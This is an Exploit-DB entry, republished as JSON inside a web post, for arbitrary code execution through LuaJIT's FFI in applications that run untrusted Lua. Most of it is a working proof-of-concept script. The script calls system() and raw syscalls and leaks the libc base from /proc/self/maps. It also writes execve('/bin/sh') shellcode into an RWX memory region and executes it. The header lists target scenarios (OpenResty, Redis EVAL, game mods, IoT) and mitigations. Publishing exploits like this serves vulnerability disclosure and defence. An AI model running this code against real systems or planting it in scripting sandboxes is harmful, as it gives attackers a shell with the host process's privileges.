{“lastseen”:”2026-05-07T15:27:58″,”description”:”– Exploit Title: LuaJIT 2.1.1774638290 – Arbitrary Code Execution — Date: 2026-03-29 — Exploit Author: TaurusOmar — Vendor Homepage: https:\/\/luajit.org\/ — Software Link: https:\/\/luajit.org\/download.html — Version: LuaJIT 2.1.1774638290 latest –…”,”published”:”2026-05-07T00:00:00″,”modified”:”2026-05-07T00:00:00″,”type”:”exploitdb”,”title”:”LuaJIT 2.1.1774638290 – Arbitrary Code Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52554″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”– Exploit Title: LuaJIT 2.1.1774638290 – Arbitrary Code Execution \\r\\n– Date: 2026-03-29\\r\\n– Exploit Author: TaurusOmar\\r\\n– Vendor Homepage: https:\/\/luajit.org\/\\r\\n– Software Link: https:\/\/luajit.org\/download.html\\r\\n– Version: LuaJIT 2.1.1774638290 (latest)\\r\\n– Tested on: Linux x86-64 (Arch Linux)\\r\\n\\r\\n\\r\\n– Description:\\r\\n– LuaJIT’s Foreign Function Interface (FFI) provides unrestricted access\\r\\n– to native C functions including syscall(), mmap(), mprotect() and \\r\\n– arbitrary shared library loading. When FFI is accessible to untrusted\\r\\n– Lua code in embedding scenarios (OpenResty, Redis, game engines, IoT),\\r\\n– an attacker can achieve arbitrary code execution with full process \\r\\n– privileges including shellcode execution via mmap(RWX)+ffi.copy()+ffi.cast().\\r\\n–\\r\\n– This affects any application embedding LuaJIT 2.1.x without explicitly\\r\\n– disabling FFI (-DLUAJIT_DISABLE_FFI) or removing it from the sandbox\\r\\n– environment before executing untrusted scripts.\\r\\n–\\r\\n– Verified on LuaJIT 2.1.1774638290 (March 2026) \u2014 latest version.\\r\\n–\\r\\n– Attack scenarios:\\r\\n– – OpenResty\/Nginx with user-controlled Lua scripts\\r\\n– – Redis with exposed EVAL interface\\r\\n– – Game engines with Lua modding systems\\r\\n– – IoT devices with Lua scripting interface\\r\\n–\\r\\n– Mitigation:\\r\\n– – Compile with -DLUAJIT_DISABLE_FFI\\r\\n– – Remove ‘ffi’ from sandbox environment table\\r\\n– – Apply OS-level restrictions: seccomp-bpf, AppArmor, namespaces\\r\\n\\r\\nlocal ffi = require(\\”ffi\\”)\\r\\nlocal bit = require(\\”bit\\”)\\r\\n\\r\\nffi.cdef[[\\r\\n int getpid(void);\\r\\n long syscall(long number, …);\\r\\n int system(const char *command);\\r\\n void *mmap(void *addr, size_t length, int prot,\\r\\n int flags, int fd, long offset);\\r\\n int munmap(void *addr, size_t length);\\r\\n]]\\r\\n\\r\\nprint(\\”=\\” .. string.rep(\\”=\\”, 55))\\r\\nprint(\\” LuaJIT 2.1.x – FFI Unrestricted Syscall Access PoC\\”)\\r\\nprint(\\”=\\” .. string.rep(\\”=\\”, 55))\\r\\n\\r\\n– dlsym resolves libc symbols without restriction\\r\\nlocal pid_libc = ffi.C.getpid()\\r\\nprint(\\”\\\\n[1] ffi.C.getpid() via dlsym: \\” .. pid_libc)\\r\\n\\r\\n– Direct kernel syscall channel (SYS_getpid = 39 x86-64)\\r\\nlocal pid_sc = tonumber(ffi.C.syscall(39))\\r\\nprint(\\”[2] syscall(39) direct: \\” .. pid_sc)\\r\\n\\r\\nif pid_libc == pid_sc then\\r\\n print(\\”[+] Both channels confirmed active\\\\n\\”)\\r\\nend\\r\\n\\r\\n– ASLR bypass via \/proc\/self\/maps\\r\\nlocal f = io.open(\\”\/proc\/self\/maps\\”, \\”r\\”)\\r\\nfor line in f:lines() do\\r\\n if line:find(\\”libc.so\\”) and line:find(\\”r–p\\”) then\\r\\n local base = tonumber(\\”0x\\” .. line:match(\\”^(%x+)\\”))\\r\\n print(\\”[3] libc base (ASLR bypass): 0x\\” .. string.format(\\”%x\\”, base))\\r\\n break\\r\\n end\\r\\nend\\r\\nf:close()\\r\\n\\r\\n– Arbitrary command execution\\r\\nprint(\\”[4] ffi.C.system(‘id’):\\”)\\r\\nffi.C.system(\\”id\\”)\\r\\n\\r\\n– Shellcode execution via mmap(RWX)\\r\\nprint(\\”\\\\n[5] Shellcode execution via mmap(RWX):\\”)\\r\\nlocal PROT_RWX = bit.bor(1, 2, 4)\\r\\nlocal MAP_FLAGS = bit.bor(0x02, 0x20)\\r\\n\\r\\n– x86-64 execve(\\”\/bin\/sh\\”, NULL, NULL) – syscall 59\\r\\nlocal shellcode =\\r\\n \\”\\\\x48\\\\x31\\\\xd2\\”\\r\\n .. \\”\\\\x48\\\\xbb\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\\x00\\”\\r\\n .. \\”\\\\x53\\”\\r\\n .. \\”\\\\x48\\\\x89\\\\xe7\\”\\r\\n .. \\”\\\\x48\\\\x31\\\\xf6\\”\\r\\n .. \\”\\\\x48\\\\x31\\\\xc0\\”\\r\\n .. \\”\\\\xb0\\\\x3b\\”\\r\\n .. \\”\\\\x0f\\\\x05\\”\\r\\n\\r\\nlocal mem = ffi.C.mmap(nil, 4096, PROT_RWX, MAP_FLAGS, -1, 0)\\r\\nif ffi.cast(\\”long\\”, mem) ~= -1 then\\r\\n print(\\” RWX region: 0x\\” .. string.format(\\”%x\\”, ffi.cast(\\”unsigned long\\”, mem)))\\r\\n ffi.copy(mem, shellcode, #shellcode)\\r\\n print(\\” Shellcode written. Executing execve(‘\/bin\/sh’)…\\”)\\r\\n local fn = ffi.cast(\\”void(*)(void)\\”, mem)\\r\\n fn()\\r\\nend”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52554″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52554″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-07T15:27:58″,”description”:”– Exploit Title: LuaJIT 2.1.1774638290 – Arbitrary Code Execution — Date: 2026-03-29 — Exploit Author: TaurusOmar — Vendor Homepage: https:\/\/luajit.org\/ — Software Link: https:\/\/luajit.org\/download.html —…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-52108","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n